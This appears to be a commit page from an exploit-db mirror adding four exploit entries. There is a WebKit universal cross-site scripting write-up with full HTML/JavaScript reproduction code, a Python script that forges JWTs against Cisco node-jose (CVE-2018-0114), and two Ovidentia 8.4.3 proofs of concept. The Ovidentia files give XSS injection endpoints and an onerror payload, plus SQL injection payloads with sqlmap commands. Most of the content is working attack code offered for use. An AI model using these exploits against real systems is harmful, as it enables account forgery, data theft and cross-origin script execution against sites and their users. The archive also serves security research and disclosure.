bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-07-26

Browse source 
4 changes to exploits/shellcodes

WebKit - Universal Cross-Site Scripting due to Synchronous Page Loads
Ovidentia 8.4.3 - Cross-Site Scripting
Ovidentia 8.4.3 - SQL Injection
This commit is contained in:
Offensive Security 2019-07-26 05:02:11 +00:00
parent f529fc0415
commit f671a16b46
5 changed files with 389 additions and 28 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

240
exploits/multiple/dos/47162.txt Normal file
View file

@ -0,0 +1,240 @@
BACKGROUND
As lokihardt@ has demonstrated in https://bugs.chromium.org/p/project-zero/issues/detail?id=1121,
WebKit's support of the obsolete `showModalDialog` method gives an attacker the ability to perform
synchronous cross-origin page loads. In certain conditions, this might lead to
time-of-check-time-of-use bugs in the code responsible for enforcing the Same-Origin Policy. In
particular, the original bug exploited a TOCTOU bug in `SubframeLoader::requestFrame` to achieve
UXSS.
(copied from lokihardt's report)
```
bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)
{
// Support for <frame src="javascript:string">
URL scriptURL;
URL url;
if (protocolIsJavaScript(urlString)) {
scriptURL = completeURL(urlString); // completeURL() encodes the URL.
url = blankURL();
} else
url = completeURL(urlString);
if (shouldConvertInvalidURLsToBlank() && !url.isValid())
url = blankURL();
Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); <<------- in here, the synchronous page load is made.
if (!frame)
return false;
if (!scriptURL.isEmpty())
frame->script().executeIfJavaScriptURL(scriptURL); <<----- boooom
return true;
}
```
The bug was fixed by inserting an extra access check right in front of the `executeIfJavaScriptURL`
call.
```
- if (!scriptURL.isEmpty())
+ if (!scriptURL.isEmpty() && ownerElement.isURLAllowed(scriptURL))
frame->script().executeIfJavaScriptURL(scriptURL);
```
It has stopped the original attack, but a year later https://bugs.webkit.org/show_bug.cgi?id=187203
was reported, which abused the HTML parser to bypass the added check. The problem was that
`isURLAllowed` didn't block `javascript:` URIs when the JavaScript execution context stack was
empty, i.e. when the `requestFrame` call was originating from the parser, so the exploit just needed
to make the parser insert an `iframe` element with a `javascript:` URI and use its `onload` handler
to load a cross-origin page inside `loadOrRedirectSubframe`.
As a result, another check has been added (see the comment below):
```
+ bool hasExistingFrame = ownerElement.contentFrame();
Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList);
if (!frame)
return false;
- if (!scriptURL.isEmpty() && ownerElement.isURLAllowed(scriptURL))
+ // If we create a new subframe then an empty document is loaded into it synchronously and may
+ // cause script execution (say, via a DOM load event handler) that can do anything, including
+ // navigating the subframe. We only want to evaluate scriptURL if the frame has not been navigated.
+ bool canExecuteScript = hasExistingFrame || (frame->loader().documentLoader() && frame->loader().documentLoader()->originalURL() == blankURL());
+ if (!scriptURL.isEmpty() && canExecuteScript && ownerElement.isURLAllowed(scriptURL))
frame->script().executeIfJavaScriptURL(scriptURL);
```
VULNERABILITY DETAILS
The second fix relies on the assumption that the parser can't trigger a `requestFrame` call for an
`iframe` element with an existing content frame. However, due to the way the node insertion
algorithm is implemented, it's possible to run JavaScript while the element's insertion is still in
progress:
https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/dom/ContainerNode.cpp#L185
```
static ALWAYS_INLINE void executeNodeInsertionWithScriptAssertion(ContainerNode& containerNode, Node& child,
ContainerNode::ChildChangeSource source, ReplacedAllChildren replacedAllChildren, DOMInsertionWork doNodeInsertion)
{
NodeVector postInsertionNotificationTargets;
{
ScriptDisallowedScope::InMainThread scriptDisallowedScope;
if (UNLIKELY(containerNode.isShadowRoot() || containerNode.isInShadowTree()))
containerNode.containingShadowRoot()->resolveSlotsBeforeNodeInsertionOrRemoval();
doNodeInsertion();
ChildListMutationScope(containerNode).childAdded(child);
postInsertionNotificationTargets = notifyChildNodeInserted(containerNode, child);
}
[...]
ASSERT(ScriptDisallowedScope::InMainThread::isEventDispatchAllowedInSubtree(child));
for (auto& target : postInsertionNotificationTargets)
target->didFinishInsertingNode();
[...]
```
Note that `HTMLFrameElementBase::didFinishInsertingNode` eventually calls `requestFrame`. So, if a
subtree which is being inserted contains multiple `iframe` elements, the first one can act as a
trigger for the JavaScript code that creates a content frame for another element right before its
`requestFrame` method is executed to bypass the `canExecuteScript` check. `isURLAllowed` again can
be tricked with the help of the HTML parser.
It's also worth noting that the `showModalDialog` method has to be triggered by a user gesture. On
the other hand, an attacker can't just wrap the exploit in a `click` event handler, as it would put
an execution context on the stack and make the `isURLAllowed` check fail. One way to overcome this
is to save a gesture token by performing an asynchronous load of a `javascript:` URI.
VERSION
Safari 12.0.3 (14606.4.5)
WebKit r243998
REPRODUCTION CASE
<body>
<h1>Click anywhere</h1>
<script>
let counter = 0;
function run() {
if (++counter == 2) {
parent_frame = frame.contentDocument.querySelector("iframe");
frame1 = parent_frame.appendChild(document.createElement("iframe"));
frame2 = parent_frame.appendChild(document.createElement("iframe"));
frame1.src = "javascript:top.runChild()";
}
}
let child_counter = 0;
function runChild() {
if (++child_counter == 2) {
parent_frame.appendChild(frame2);
a = frame2.contentDocument.createElement("a");
a.href = cache_frame.src;
a.click();
showModalDialog(URL.createObjectURL(new Blob([`
<script>
let intervalID = setInterval(() => {
try {
opener.frame.document.foo;
} catch (e) {
clearInterval(intervalID);
window.close();
}
}, 100);
</scr` + "ipt>"], {type: "text/html"})));
frame2.src = "javascript:alert(document.documentElement.outerHTML)";
}
}
onclick = _ => {
frame = document.body.appendChild(document.createElement("iframe"));
frame.contentWindow.location = `javascript:'<b><p><iframe`
+ ` src="javascript:top.run()"></iframe></b></p>'`;
}
cache_frame = document.body.appendChild(document.createElement("iframe"));
cache_frame.src = "http://example.com/"; // victim page URL
cache_frame.style.display = "none";
</script>
</body>
From WebKit's bugtracker:
Unfortunately, even though the patch from https://trac.webkit.org/changeset/244892/webkit
has blocked the original repro case because it relies on executing javascript: URIs synchronously,
the underlying issue is still not fixed.
Currently, `requestFrame` is implemented as follows:
bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)
{
[...]
Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); // ***1***
if (!frame)
return false;
if (!scriptURL.isEmpty() && ownerElement.isURLAllowed(scriptURL)) {
// FIXME: Some sites rely on the javascript:'' loading synchronously, which is why we have this special case.
// Blink has the same workaround (https://bugs.chromium.org/p/chromium/issues/detail?id=923585).
if (urlString == "javascript:''" || urlString == "javascript:\"\"")
frame->script().executeIfJavaScriptURL(scriptURL);
else
frame->navigationScheduler().scheduleLocationChange(ownerElement.document(), ownerElement.document().securityOrigin(), scriptURL, m_frame.loader().outgoingReferrer(), lockHistory, lockBackForwardList, stopDelayingLoadEvent.release()); // ***2***
}
return true;
}
By the time the subframe loader schedules a JS URI load in [2], the frame might already contain a
cross-origin victim page loaded in [1], so the JS URI might get executed in the cross-origin
context.
Updated repro:
<body>
<h1>Click anywhere</h1>
<script>
let counter = 0;
function run(event) {
++counter;
if (counter == 2) {
event.target.src = "javascript:alert(document.documentElement.outerHTML)";
} else if (counter == 3) {
frame = event.target;
a = frame.contentDocument.createElement("a");
a.href = cache_frame.src;
a.click();
showModalDialog(URL.createObjectURL(new Blob([`
<script>
let intervalID = setInterval(() => {
try {
opener.frame.document.foo;
} catch (e) {
clearInterval(intervalID);
window.close();
}
}, 100);
</scr` + "ipt>"], {type: "text/html"})));
}
}
onclick = _ => {
frame = document.body.appendChild(document.createElement("iframe"));
frame.contentWindow.location = `javascript:'<b><p><iframe`
+ ` onload="top.run(event)"></iframe></b></p>'`;
}
cache_frame = document.body.appendChild(document.createElement("iframe"));
cache_frame.src = "http://example.com/"; // victim page URL
cache_frame.style.display = "none";
</script>
</body>
I'd recommend you consider applying a fix similar to the one that the Blink team has in
https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/html/html_frame_element_base.cc?rcl=d3f22423d512b45466f1694020e20da9e0c6ee6a&l=62,
i.e. using the frame's owner document as a fallback for the security check.

63
exploits/multiple/webapps/44324.py
View file

@ -1,14 +1,20 @@
#!/usr/bin/env python3
import base64 import base64
import urllib from urllib.parse import quote_plus
import rsa import rsa
import sys import sys
#zi0Black #zi0Black
''' '''
EDB Note: This has been updated ~ https://github.com/offensive-security/exploitdb/pull/139
POC of CVE-2018-0114 Cisco node-jose <0.11.0 POC of CVE-2018-0114 Cisco node-jose <0.11.0
Example: python3 44324.py "mypayload" 512
Created by Andrea Cappa aka @zi0Black (GitHub,Twitter,Telegram) Created by Andrea Cappa aka @zi0Black (GitHub,Twitter,Telegram)
Enhanced for python3 by github.com/eshaan7
Mail: a.cappa@zioblack.xyz Mail: a.cappa@zioblack.xyz
Site: https://zioblack.xyz Site: https://zioblack.xyz
@ -20,63 +26,64 @@ Site: https://pentesterlab.com
''' '''
def generate_key (key_size): def generate_key(key_size):
#create rsa priv & public key #create rsa priv & public key
print ("[+]Creating-RSA-pair-key") print ("[+]Creating-RSA-pair-key")
(public_key,private_key)=rsa.newkeys(key_size,poolsize=8) (public_key,private_key) = rsa.newkeys(key_size,poolsize=8)
print ("\t[+]Pair-key-created") print ("\t[+]Pair-key-created")
return private_key, public_key return private_key, public_key
def to_bytes(n, length, endianess='big'): def pack_bigint(i):
h = '%x' % n b = bytearray()
s = ('0'*(len(h) % 2) + h).zfill(length*2).decode('hex') while i:
return s if endianess == 'big' else s[::-1] b.append(i & 0xFF)
i >>= 8
return b[::-1]
def generate_header_payload(payload,pubkey): def generate_header_payload(payload,pubkey):
#create header and payload #create header and payload
print ("[+]Assembling-the-header-and-the-payload") print ("[+]Assembling-the-header-and-the-payload")
xn = pubkey.n n=base64.urlsafe_b64encode(pack_bigint(pubkey.n)).decode('utf-8').rstrip('=')
xe = pubkey.e e=base64.urlsafe_b64encode(pack_bigint(pubkey.e)).decode('utf-8').rstrip('=')
n=base64.urlsafe_b64encode(to_bytes(xn,sys.getsizeof(xn),'big')) headerAndPayload = base64.b64encode(('{"alg":"RS256",'
e=base64.urlsafe_b64encode(to_bytes(xe,sys.getsizeof(xe),'big'))
headerAndPayload = base64.b64encode('{"alg":"RS256",'
'"jwk":{"kty":"RSA",' '"jwk":{"kty":"RSA",'
'"kid":"topo.gigio@hackerzzzz.own",' '"kid":"topo.gigio@hackerzzzz.own",'
'"use":"sig",' '"use":"sig",'
'"n":"'+n+'",' '"n":"'+n+'",'
'"e":"'+e+'"}}') '"e":"'+e+'"}}').encode())
headerAndPayload=headerAndPayload+"."+base64.b64encode(payload) headerAndPayload = headerAndPayload+b"."+base64.b64encode(payload)
headerAndPayload = headerAndPayload.encode('utf-8').replace("=","") headerAndPayload = headerAndPayload
print ("\t[+]Assembed") print ("\t[+]Assembed")
return headerAndPayload return headerAndPayload
def generate_signature (firstpart,privkey): def generate_signature(firstpart,privkey):
#create signature #create signature
signature = rsa.sign(firstpart,privkey,'SHA-256') signature = rsa.sign(firstpart,privkey,'SHA-256')
signatureEnc = base64.b64encode(signature).encode('utf-8').replace("=", "") signatureEnc = base64.b64encode(signature)
print ("[+]Signature-created") print ("[+]Signature-created")
return signatureEnc return signatureEnc
def create_token(headerAndPayload,sign): def create_token(headerAndPayload,sign):
print ("[+]Forging-of-the-token\n\n") print ("[+]Forging-of-the-token\n\n")
token = headerAndPayload+"."+sign token = (headerAndPayload+b"."+sign).decode('utf-8').rstrip('=')
token = urllib.quote_plus(token) token = quote_plus(token)
return token return token
if(len(sys.argv)>0): if(len(sys.argv)>0):
payload = str(sys.argv[1]) payload = bytes(str(sys.argv[1]).encode('ascii'))
key_size = sys.argv[2] key_size = int(sys.argv[2])
else: else:
payload = 'somthings' payload = b'admin'
key_size = int(512)
banner=""" banner="""
_____ __ __ ______ ___ ___ __ ___ ___ __ __ _ _ _____ __ __ ______ ___ ___ __ ___ ___ __ __ _ _
/ ____| \ \ / / | ____| |__ \ / _ \ /_ | / _ \ / _ \ /_ | /_ | | || | / ____| \ \ / / | ____| |__ \ / _ \ /_ | / _ \ / _ \ /_ | /_ | | || |
| | \ \ / / | |__ ______ ) | | | | | | | | (_) | ______ | | | | | | | | | || |_ | | \ \ / / | |__ ______ ) | | | | | | | | (_) | ______ | | | | | | | | | || |_
| | \ \/ / | __| |______| / / | | | | | | > _ < |______| | | | | | | | | |__ _| | | \ \/ / | __| |______| / / | | | | | | > _ < |______| | | | | | | | | |__ _|
| |____ \ / | |____ / /_ | |_| | | | | (_) | | |_| | | | | | | | | |____ \ / | |____ / /_ | |_| | | | | (_) | | |_| | | | | | | |
\_____| \/ |______| |____| \___/ |_| \___/ \___/ |_| |_| |_| by @zi0Black \_____| \/ |______| |____| \___/ |_| \___/ \___/ |_| |_| |_| by @zi0Black
""" """
if __name__ == '__main__': if __name__ == '__main__':

74
exploits/php/webapps/47159.txt Normal file
View file

@ -0,0 +1,74 @@
#-------------------------------------------------------
# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ]
# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ]
# Date: [ 06/05/2019 ]
# CVE: [ CVE-2019-13977 ]
# Exploit Author:
# [ Fernando Pinheiro (n3k00n3) ]
# [ Victor Flores (UserX) ]
# Vendor Homepage: [
https://www.ovidentia.org/
]
# Version: [ 8.4.3 ]
# Tested on: [ Mac,linux - Firefox, safari ]
# Download: [
http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
]
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------
POC
>========================================================
Stored XSS
>========================================================
1. POST
http://TARGET/ovidentia/index.php?tg=groups
Field:
nom
2. POST
http://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Fields:
Nom
Description
3. GET
http://TARGET/ovidentia/index.php?tg=delegat
Show groups
4. POST
http://TARGET/ovidentia/index.php?tg=site&idx=create
http://TARGET/ovidentia/index.php?tg=site&item=4
Fields:
Nom
address
description
5. POST
http://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1
Fields:
Libellé du champ
Explosion:
http://TARGET/ovidentia/index.php?tg=forums&idx=notices
http://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1
http://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1
6. POST
http://TARGET/ovidentia/index.php?tg=notes&idx=Create
Fields: Notes
Explosion:
http://TARGET/ovidentia/index.php?tg=notes&idx=List
7. POST
http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add
Fields: all
Explosion:
http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2
>========================================================
REFLECTED
>========================================================
1. GET
http://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
Sent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland.

37
exploits/php/webapps/47160.txt Normal file
View file

@ -0,0 +1,37 @@
#-------------------------------------------------------
# Exploit Title: [ Ovidentia CMS - SQL Injection (Authenticated) ]
# Date: [ 06/05/2019 ]
# CVE: [ CVE-2019-13978 ]
# Exploit Author:
# [ Fernando Pinheiro (n3k00n3) ]
# [ Victor Flores (UserX) ]
# Vendor Homepage: [
https://www.ovidentia.org/
]
# Version: [ 8.4.3 ]
# Tested on: [ Mac,linux - Firefox, safari ]
# Download [
http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
]
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------
POC
Path: /ovidentia/index.php?tg=delegat&idx=mem&id=1
Type: GET
Vulnerable Field: id
Payload:
1. tg=delegat&idx=mem&id=1 AND 3152=(SELECT (CASE WHEN (3152=3152) THEN 3152 ELSE (SELECT 9962 UNION SELECT
2. tg=delegat&idx=mem&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QwTg)
URL:
https://target/ovidentia/index.php?tg=delegat&idx=mem&id=1
Using Request file
sqlmap.py -r req --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs
Using Get
./sqlmap.py -u
[http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1](http://target/ovidentia/index.php/?tg\=delegat\&idx\=mem\&id\=1)
--cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs

3
files_exploits.csv
View file

@ -6513,6 +6513,7 @@ id,file,description,date,author,type,platform,port
47131,exploits/windows/dos/47131.py,"WinMPG iPod Convert 3.0 - 'Register' Denial of Service",2019-07-17,stresser,dos,windows, 47131,exploits/windows/dos/47131.py,"WinMPG iPod Convert 3.0 - 'Register' Denial of Service",2019-07-17,stresser,dos,windows,
47148,exploits/linux/dos/47148.py,"BACnet Stack 0.8.6 - Denial of Service",2019-07-22,mmorillo,dos,linux, 47148,exploits/linux/dos/47148.py,"BACnet Stack 0.8.6 - Denial of Service",2019-07-22,mmorillo,dos,linux,
47158,exploits/watchos/dos/47158.txt,"Apple iMessage - DigitalTouch tap Message Processing Out-of-Bounds Read",2019-07-24,"Google Security Research",dos,watchos, 47158,exploits/watchos/dos/47158.txt,"Apple iMessage - DigitalTouch tap Message Processing Out-of-Bounds Read",2019-07-24,"Google Security Research",dos,watchos,
47162,exploits/multiple/dos/47162.txt,"WebKit - Universal Cross-Site Scripting due to Synchronous Page Loads",2019-07-25,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -41533,3 +41534,5 @@ id,file,description,date,author,type,platform,port
47152,exploits/php/webapps/47152.txt,"NoviSmart CMS - SQL injection",2019-07-24,n1x_,webapps,php, 47152,exploits/php/webapps/47152.txt,"NoviSmart CMS - SQL injection",2019-07-24,n1x_,webapps,php,
47153,exploits/hardware/webapps/47153.html,"Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery",2019-07-24,"Mehmet Onder",webapps,hardware, 47153,exploits/hardware/webapps/47153.html,"Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery",2019-07-24,"Mehmet Onder",webapps,hardware,
47154,exploits/php/webapps/47154.py,"WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions",2019-07-24,yasin,webapps,php, 47154,exploits/php/webapps/47154.py,"WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions",2019-07-24,yasin,webapps,php,
47159,exploits/php/webapps/47159.txt,"Ovidentia 8.4.3 - Cross-Site Scripting",2019-07-25,n3k00n3,webapps,php,80
47160,exploits/php/webapps/47160.txt,"Ovidentia 8.4.3 - SQL Injection",2019-07-25,n3k00n3,webapps,php,80

Can't render this file because it is too large.